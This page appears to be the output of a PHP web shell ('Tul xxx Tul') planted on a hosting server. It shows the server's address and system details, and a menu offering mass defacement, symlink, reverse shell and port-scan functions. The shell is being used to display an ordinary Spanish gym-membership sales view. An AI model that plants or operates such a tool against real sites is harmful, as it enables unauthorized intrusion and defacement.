Tul xxx Tul
User / IP
:
216.73.216.191
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
gimnasiofitnes
/
app
/
Views
/
admin
/
memberships
/
Viewing: sale.php
<?= $this->extend('layout/app'); ?> <?php $this->section('title'); ?> Venta de Membresía <?php $this->endSection(); ?> <?php $this->section('content'); ?> <div class="app-title"> <div> <h1><i class="bi bi-person-vcard"></i> Venta de Membresía</h1> <p>Registrar nuevas membresías para clientes</p> </div> <ul class="app-breadcrumb breadcrumb"> <li class="breadcrumb-item"><i class="bi bi-house-door fs-6"></i></li> <li class="breadcrumb-item"><a href="<?= base_url('admin'); ?>">Admin</a></li> <li class="breadcrumb-item"><a href="#">Venta Membresía</a></li> </ul> </div> <div class="row"> <div class="col-md-12"> <div class="tile shadow-sm border-0"> <div class="tile-body"> <form id="membershipSaleForm"> <div class="row"> <div class="col-md-6"> <div class="mb-3 p-3 rounded shadow-sm border bg-white"> <input type="hidden" id="client_id" name="user_id"> <label class="form-label text-muted small fw-bold text-uppercase">Cliente *</label> <div class="input-group"> <input type="text" class="form-control" disabled id="client" name="client" placeholder="Buscar Cliente *"> <button class="btn btn-primary" data-bs-toggle="modal" data-bs-target="#modalCliente" type="button"><i class="bi bi-plus-circle"></i></button> </div> </div> <div class="mb-3 p-3 rounded shadow-sm border bg-white"> <label for="membership_type_id" class="form-label text-muted small fw-bold text-uppercase">Tipo de Membresía *</label> <select class="form-select select2" id="membership_type_id" name="membership_type_id"> <option value="">Seleccionar Tipo</option> <?php foreach ($membershipTypes as $type): ?> <option value="<?= $type['id'] ?>" data-price="<?= $type['amount'] ?>" data-duration="<?= $type['duration'] ?>"> <?= esc($type['name']) ?> (<?= number_format($type['amount'], 2) ?> - <?= $type['duration'] ?>) </option> <?php endforeach; ?> </select> </div> </div> <div class="col-md-6"> <div class="mb-3 p-3 rounded shadow-sm border bg-white"> <label for="payment_type" class="form-label text-muted small fw-bold text-uppercase">Tipo de Pago *</label> <select class="form-select mb-3" id="payment_type" name="payment_type"> <option value="contado">🛒 CONTADO</option> <option value="credito">💳 CRÉDITO</option> </select> <label for="payment_method_id" class="form-label text-muted small fw-bold text-uppercase">Método de Pago *</label> <select class="form-select select2" id="payment_method_id" name="payment_method_id"> <?php foreach ($paymentMethods as $method): ?> <option value="<?= $method['id'] ?>"><?= esc($method['name']) ?></option> <?php endforeach; ?> </select> </div> <div class="mb-3 p-3 rounded shadow-sm border bg-white" id="box_selection_container"> <label for="box_id" class="form-label text-muted small fw-bold text-uppercase">Caja *</label> <select class="form-select select2" id="box_id" name="box_id"> <option value="">Seleccionar</option> <?php foreach ($boxes as $box): ?> <option value="<?= $box['id'] ?>"><?= $box['name'] . ' - ' . $box['opening_date']; ?></option> <?php endforeach; ?> </select> </div> </div> </div> <div class="row"> <div class="col-md-12 text-end"> <h4>Total Membresía: <span id="membershipPrice">0.00</span></h4> <button type="submit" class="btn btn-primary" id="btnRegisterMembership">Registrar Membresía</button> </div> </div> </form> </div> </div> </div> </div> <!-- Modal Cliente --> <div class="modal fade" id="modalCliente" tabindex="-1"> <div class="modal-dialog modal-lg"> <div class="modal-content"> <div class="modal-header bg-dark text-white"> <h5 class="modal-title">Buscar Cliente</h5> <button type="button" class="btn-close btn-close-white" data-bs-dismiss="modal"></button> </div> <div class="modal-body"> <div class="table-responsive"> <table class="table table-hover table-bordered" id="tblClients"> <thead> <tr> <th>ID</th> <th>Nombre</th> <th>Teléfono</th> <th></th> </tr> </thead> <tbody> <!-- Clientes se cargarán aquí vía DataTables --> </tbody> </table> </div> </div> </div> </div> </div> <?php $this->endSection(); ?> <?php $this->section('js'); ?> <script src="<?= base_url('assets/admin/js/pages/membership-sale.js') ?>"></script> <?php $this->endSection(); ?>
Coded With 💗 by
0x6ick